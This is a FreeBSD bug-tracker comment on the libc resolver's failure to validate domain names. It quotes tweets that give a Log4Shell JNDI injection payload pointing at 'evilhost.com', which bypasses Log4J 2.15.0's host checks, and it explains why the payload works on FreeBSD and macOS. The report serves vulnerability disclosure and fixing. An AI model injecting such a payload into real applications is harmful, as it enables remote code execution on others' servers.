[Bug 260770] libc resolver does not validate domain names
- In reply to: bugzilla-noreply_a_freebsd.org: "[Bug 260770] libc resolver does not validate domain names"
- Go to: [ bottom of page ] [ top of archives ] [ this month ]
Date: Wed, 29 Dec 2021 01:24:29 UTC
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=260770
--- Comment #1 from Ed Maste <emaste@freebsd.org> ---
Ref:
https://twitter.com/marcioalm/status/1471740771581652995
> FIX: Here is a PoC in how to bypass allowedLdapHost and allowedClasses checks
> in Log4J 2.15.0. to achieve RCE: ${jndi:ldap://127.0.0.1#evilhost.com:1389/a}
> and to bypass allowedClasses just choose a name for a class in the JDK.
> Deserialization will occur as usual. #Log4Shell 1/n
https://twitter.com/Shaquil86300527/status/1472153790463815680
> In my tests, this doesn’t work on Windows and Linux. It does works in MacOS and
> FreeBSD.
> # is not a valid for DNS but *some* resolver might query names with # in it.
> TBC for this to work the vulnerable application must run on freeBSD or MacOS
> and actor must control a DNS domain.
--
You are receiving this mail because:
You are the assignee for the bug.